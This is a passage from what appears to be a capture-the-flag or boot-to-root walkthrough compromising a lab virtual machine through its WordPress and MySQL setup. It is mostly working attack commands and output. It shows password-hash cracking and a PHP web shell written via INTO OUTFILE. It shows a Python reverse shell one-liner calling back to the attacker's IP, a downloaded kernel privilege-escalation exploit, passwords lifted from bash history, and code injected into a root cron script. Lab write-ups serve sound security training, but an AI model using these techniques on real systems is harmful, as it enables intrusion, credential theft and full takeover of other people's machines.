* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');/** MySQL database username */
define('DB_USER', 'root');/** MySQL database password */
define('DB_PASSWORD', 'plbkac');/** MySQL hostname */
define('DB_HOST', 'localhost');/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');/**#@-*//**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);/* That's all, stop editing! Happy blogging. *//** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');define('WP_HTTP_BLOCK_EXTERNAL', true);
root@kali:~/B2R#
So we have credentials for MySQL.
root@kali:~/B2R# mysql -uroot -pplbkac -h 192.168.1.30
Warning: Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 48
Server version: 5.7.12-0ubuntu1 (Ubuntu)Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| loot |
| mysql |
| performance_schema |
| phpmyadmin |
| proof |
| sys |
| wordpress |
+--------------------+
8 rows in set (0.01 sec)mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
11 rows in set (0.00 sec)
mysql> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| John | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
| Elly | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
| Peter | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
| barry | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
| heather | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
| garry | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
| harry | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
| scott | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
| kathy | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
| tim | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
| ZOE | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
| Dave | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
| Simon | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
| Abby | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
| Vicki | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
| Pam | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
+------------+------------------------------------+
16 rows in set (0.00 sec)mysql> exit
Bye
Lets crack the password using john. Usually the first user is the admin so we will try and crack just his password, just to save time 😀
root@kali:~/B2R# cat hash.txt
John:$P$B7889EMq/erHIuZapMB8GEizebcIy9.
root@kali:~/B2R# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
incorrect (John)
1g 0:00:00:52 DONE (2017-05-15 00:08) 0.01895g/s 3501p/s 3501c/s 3501C/s ireland4..im4jesus
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/B2R#Lets login to the admin panel using the obtained credentials.
Lets upload the in-famous php-reverse shell by pentest monkey as a plugin. Before uploading make the necessary changes.
$ip = '192.168.1.28'; // CHANGE THIS
$port = 443; // CHANGE THIS
Access the shell at https://192.168.1.30:12380/blogblog/wp-content/uploads/
Before running the shell set up a listener.
root@kali:~/B2R# nc -v -n -l -p 443
listening on [any] 443 ...
connect to [192.168.1.28] from (UNKNOWN) [192.168.1.30] 59418
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
05:23:24 up 2:52, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
$ file /bin/cat
/bin/cat: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=2874f374614e9b7cd7b6cbb31e9dd3e59132943e, strippedPrivilege Escalation — Method 1
Search for relevant exploits. We find 2 suitable candidates : 40049.c, 39772.txt But we discard 40049.c because it runs on a 64 bit machine but our target is 32 bit.
Lets have a look at 39772.txt
Inspecting the exploit
root@kali:~/B2R# wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2017-05-15 00:31:46-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)... 192.30.255.112, 192.30.255.113
Connecting to github.com (github.com)|192.30.255.112|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2017-05-15 00:31:46-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.24.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.24.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: ‘39772.zip’39772.zip 100%[================================>] 6.86K --.-KB/s in 0s2017-05-15 00:31:46 (29.5 MB/s) - ‘39772.zip’ saved [7025/7025]root@kali:~/B2R# unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
root@kali:~/B2R# cd 39772/
root@kali:~/B2R/39772# ls
crasher.tar exploit.tar
root@kali:~/B2R/39772# tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
root@kali:~/B2R/39772# ls
crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar
root@kali:~/B2R/39772# cd ebpf_mapfd_doubleput_exploit/
root@kali:~/B2R/39772/ebpf_mapfd_doubleput_exploit# ls
compile.sh doubleput.c hello.c suidhelper.c
root@kali:~/B2R/39772/ebpf_mapfd_doubleput_exploit# cd ..
root@kali:~/B2R/39772# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.11 - - [15/May/2017 00:38:24] "GET / HTTP/1.1" 200 -
On the victims shell
$ wget http://192.168.1.28:8000/exploit.tar
--2017-05-15 05:38:37-- http://192.168.1.28:8000/exploit.tar
Connecting to 192.168.1.28:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-tar]
Saving to: 'exploit.tar'0K .......... .......... 100% 19.8M=0.001s2017-05-15 05:38:37 (19.8 MB/s) - 'exploit.tar' saved [20480/20480]$ ls
exploit.tar
$ tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ ls
ebpf_mapfd_doubleput_exploit
exploit.tar
$ cd ebpf_mapfd_doubleput_exploit
$ ls
compile.sh
doubleput.c
hello.c
suidhelper.c
$ chmod +x compile.sh
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
$ ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -la
total 208
drwx------ 4 root root 4096 May 15 02:31 .
drwxr-xr-x 22 root root 4096 Jun 7 2016 ..
-rw------- 1 root root 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 50 Jun 3 2016 .my.cnf
-rw------- 1 root root 1 Jun 5 2016 .mysql_history
drwxr-xr-x 11 root root 4096 Jun 3 2016 .oh-my-zsh
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 1024 Jun 5 2016 .rnd
drwxr-xr-x 2 root root 4096 Jun 4 2016 .vim
-rw------- 1 root root 1 Jun 5 2016 .viminfo
-rw-r--r-- 1 root root 39206 Jun 3 2016 .zcompdump
-rw-r--r-- 1 root root 39352 Jun 3 2016 .zcompdump-red-5.1.1
-rw-r--r-- 1 root root 17 Jun 3 2016 .zsh-update
-rw------- 1 root root 39 Jun 5 2016 .zsh_history
-rw-r--r-- 1 root root 2839 Jun 3 2016 .zshrc
-rwxr-xr-x 1 root root 1090 Jun 5 2016 fix-wordpress.sh
-rw-r--r-- 1 root root 463 Jun 5 2016 flag.txt
-rw-r--r-- 1 root root 345 Jun 5 2016 issue
-rwxr-xr-x 1 root root 103 Jun 5 2016 python.sh
-rw-r--r-- 1 root root 54405 Jun 5 2016 wordpress.sql
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
Privilege Escalation — Method 2
There is another {simpler} way of getting root. Rather than cracking the credentials of the wordpress users we can just upload a shell using INTO OUT file.
root@kali:~# mysql -uroot -pplbkac -h 192.168.1.32
Warning: Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.12-0ubuntu1 (Ubuntu)Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
Query OK, 1 row affected (0.00 sec)mysql> exit
Bye
root@kali:~#
Accessing the shell in the browser
Rather than editing the cmd parameter we can just get a reverse shell using pentest monkey’s python one liner.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.28",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Set up a listener
root@kali:~# nc -lvp 443
listening on [any] 443 ...Execute the one liner
https://192.168.1.32:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.28%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27Accessing the shell
root@kali:~# nc -lvp 443
listening on [any] 443 ...
192.168.1.32: inverse host lookup failed: Unknown host
connect to [192.168.1.28] from (UNKNOWN) [192.168.1.32] 57390
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@red:/var/www/https/blogblog/wp-content/uploads$ cd /
cd /
www-data@red:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@red:/$ ls -la
ls -la
total 92
drwxr-xr-x 22 root root 4096 Jun 7 2016 .
drwxr-xr-x 22 root root 4096 Jun 7 2016 ..
drwxr-xr-x 2 root root 4096 Jun 3 2016 bin
drwxr-xr-x 3 root root 4096 Jun 7 2016 boot
drwxr-xr-x 19 root root 4200 May 15 17:54 dev
drwxr-xr-x 100 root root 12288 May 15 17:54 etc
drwxr-xr-x 32 root root 4096 Jun 4 2016 home
lrwxrwxrwx 1 root root 32 Jun 3 2016 initrd.img.old -> boot/initrd.img-4.4.0-21-generic
drwxr-xr-x 18 root root 4096 Jun 7 2016 lib
drwx------ 2 root root 16384 Jun 3 2016 lost+found
drwxr-xr-x 3 root root 4096 Jun 3 2016 media
drwxr-xr-x 2 root root 4096 Apr 20 2016 mnt
drwxr-xr-x 2 root root 4096 Apr 20 2016 opt
dr-xr-xr-x 153 root root 0 May 15 17:54 proc
drwx------ 4 root root 4096 May 15 17:54 root
drwxr-xr-x 26 root root 900 May 15 17:54 run
drwxr-xr-x 2 root root 4096 Jun 3 2016 sbin
drwxr-xr-x 2 root root 4096 Apr 19 2016 snap
drwxr-xr-x 4 root root 4096 Jun 4 2016 srv
dr-xr-xr-x 13 root root 0 May 15 17:54 sys
drwxrwxrwt 7 root root 4096 May 15 18:10 tmp
drwxr-xr-x 10 root root 4096 Jun 3 2016 usr
drwxr-xr-x 16 root root 4096 Jun 6 2016 var
lrwxrwxrwx 1 root root 29 Jun 3 2016 vmlinuz.old -> boot/vmlinuz-4.4.0-21-genericRead the bash history of all users. Traverse to the /home
www-data@red:/home$ cat */.bash_history
OR
www-data@red:/home$ find -name ".bash_history" -exec cat {} \;
find -name ".bash_history" -exec cat {} \;
exit
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
top
ps aux
exit
exit
id
cat: ./peter/.bash_history: Permission denied
find: './peter/.cache': Permission denied
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
exit
exit
exit
exit
whoami
exit
exit
exit
top
exit
www-data@red:/home$So the 2 credentials we got are
peter : JZQuyIN5
JKanode : thisimypasswordLets login via SSH
root@kali:~# ssh peter@192.168.1.32
The authenticity of host '192.168.1.32 (192.168.1.32)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.32' (ECDSA) to the list of known hosts.
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
peter@192.168.1.32's password:
Welcome back!
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~). This function can help you with a few settings that should
make your use of the shell easier.You can:(q) Quit and do nothing. The function will be run again next time.(0) Exit, creating the file ~/.zshrc containing just a comment.
That will prevent this function being run again.(1) Continue to the main menu.(2) Populate your ~/.zshrc with the configuration recommended
by the system administrator and exit (you will need to edit
the file by hand, if so desired).--- Type one of the keys in parentheses ---Aborting.
The function will be run again next time. To prevent this, execute:
touch ~/.zshrc
red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% sudo -lWe trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.[sudo] password for peter:
Matching Defaults entries for peter on red:
lecture=always, env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser peter may run the following commands on red:
(ALL : ALL) ALL
red% sudo su
➜ peter cd /
➜ / cd /root
➜ ~ ls -la
total 208
drwx------ 4 root root 4096 May 15 18:27 .
drwxr-xr-x 22 root root 4096 Jun 7 2016 ..
-rw------- 1 root root 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
-rwxr-xr-x 1 root root 1090 Jun 5 2016 fix-wordpress.sh
-rw-r--r-- 1 root root 463 Jun 5 2016 flag.txt
-rw-r--r-- 1 root root 345 Jun 5 2016 issue
-rw-r--r-- 1 root root 50 Jun 3 2016 .my.cnf
-rw------- 1 root root 1 Jun 5 2016 .mysql_history
drwxr-xr-x 11 root root 4096 Jun 3 2016 .oh-my-zsh
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 103 Jun 5 2016 python.sh
-rw------- 1 root root 1024 Jun 5 2016 .rnd
drwxr-xr-x 2 root root 4096 Jun 4 2016 .vim
-rw------- 1 root root 1 Jun 5 2016 .viminfo
-rw-r--r-- 1 root root 54405 Jun 5 2016 wordpress.sql
-rw-r--r-- 1 root root 39206 Jun 3 2016 .zcompdump
-rw-r--r-- 1 root root 39352 Jun 3 2016 .zcompdump-red-5.1.1
-rw------- 1 root root 39 Jun 5 2016 .zsh_history
-rw-r--r-- 1 root root 2839 Jun 3 2016 .zshrc
-rw-r--r-- 1 root root 17 Jun 3 2016 .zsh-update
➜ ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b➜ ~
Privilege Escalation — Method 3
Following along the linux privilege escalation cheatsheet by g0tmi1k we come across a cron job names logrotate which executes cron-logrotate.sh every 5 minutes and that has r/w/x permissions for the world and is owned by root. So we can abuse this to inject custom code in the script.
root@kali:~# nc -lvp 443
listening on [any] 443 ...
192.168.1.32: inverse host lookup failed: Unknown host
connect to [192.168.1.28] from (UNKNOWN) [192.168.1.32] 57404
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@red:/var/www/https/blogblog/wp-content/uploads$ cat /etc/cron*
cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@red:/var/www/https/blogblog/wp-content/uploads$ cd /etc
www-data@red:/etc$ ls -lah cron*
ls -lah cron*
-rw-r--r-- 1 root root 722 Apr 5 2016 crontabcron.d:
total 32K
drwxr-xr-x 2 root root 4.0K Jun 3 2016 .
drwxr-xr-x 100 root root 12K May 15 17:54 ..
-rw-r--r-- 1 root root 102 Jun 3 2016 .placeholder
-rw-r--r-- 1 root root 56 Jun 3 2016 logrotate
-rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
-rw-r--r-- 1 root root 670 Mar 1 2016 phpcron.daily:
total 56K
drwxr-xr-x 2 root root 4.0K Jun 3 2016 .
drwxr-xr-x 100 root root 12K May 15 17:54 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 376 Mar 31 2016 apport
-rwxr-xr-x 1 root root 920 Apr 5 2016 apt-compat
-rwxr-xr-x 1 root root 1.6K Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 6 2015 logrotate
-rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rwxr-xr-x 1 root root 383 Mar 8 2016 samba
-rwxr-xr-x 1 root root 214 Apr 12 2016 update-notifier-commoncron.hourly:
total 20K
drwxr-xr-x 2 root root 4.0K Jun 3 2016 .
drwxr-xr-x 100 root root 12K May 15 17:54 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholdercron.monthly:
total 20K
drwxr-xr-x 2 root root 4.0K Jun 3 2016 .
drwxr-xr-x 100 root root 12K May 15 17:54 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholdercron.weekly:
total 28K
drwxr-xr-x 2 root root 4.0K Jun 3 2016 .
drwxr-xr-x 100 root root 12K May 15 17:54 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 211 Apr 12 2016 update-notifier-common
www-data@red:/etc$
www-data@red:/etc$ cat cron.d/logrotate
cat cron.d/logrotate
*/5 * * * * root /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc$ ls -la /usr/local/sbin/cron-logrotate.sh
ls -la /usr/local/sbin/cron-logrotate.sh
-rwxrwxrwx 1 root root 130 May 15 19:09 /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
www-data@red:/etc$
Injecting custom code which copies a shell into the /tmp folder, gives it suid permissions and give it root privileges.
www-data@red:/etc$ echo "cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit">>/usr/local/sbin/cron-logrotate.shwww-data@red:/etc$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit
Wait for 5 minutes and run the exploit.
www-data@red:/$ /tmp/exploit -p
/tmp/exploit -p
# cd /root
cd /root
# ls -la
ls -la
total 208
drwx------ 4 root root 4096 May 15 19:02 .
drwxr-xr-x 22 root root 4096 Jun 7 2016 ..
-rw------- 1 root root 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 50 Jun 3 2016 .my.cnf
-rw------- 1 root root 1 Jun 5 2016 .mysql_history
drwxr-xr-x 11 root root 4096 Jun 3 2016 .oh-my-zsh
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 1024 Jun 5 2016 .rnd
drwxr-xr-x 2 root root 4096 Jun 4 2016 .vim
-rw------- 1 root root 1 Jun 5 2016 .viminfo
-rw-r--r-- 1 root root 39206 Jun 3 2016 .zcompdump
-rw-r--r-- 1 root root 39352 Jun 3 2016 .zcompdump-red-5.1.1
-rw-r--r-- 1 root root 17 Jun 3 2016 .zsh-update
-rw------- 1 root root 39 Jun 5 2016 .zsh_history
-rw-r--r-- 1 root root 2839 Jun 3 2016 .zshrc
-rwxr-xr-x 1 root root 1090 Jun 5 2016 fix-wordpress.sh
-rw-r--r-- 1 root root 463 Jun 5 2016 flag.txt
-rw-r--r-- 1 root root 345 Jun 5 2016 issue
-rwxr-xr-x 1 root root 103 Jun 5 2016 python.sh
-rw-r--r-- 1 root root 54405 Jun 5 2016 wordpress.sql
# cat flag.txt
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
#I know this was a very detailed post. I just wanted to cover all the aspects of enumeration, privilege escalation and obtaining root.
Happy Hacking !!!
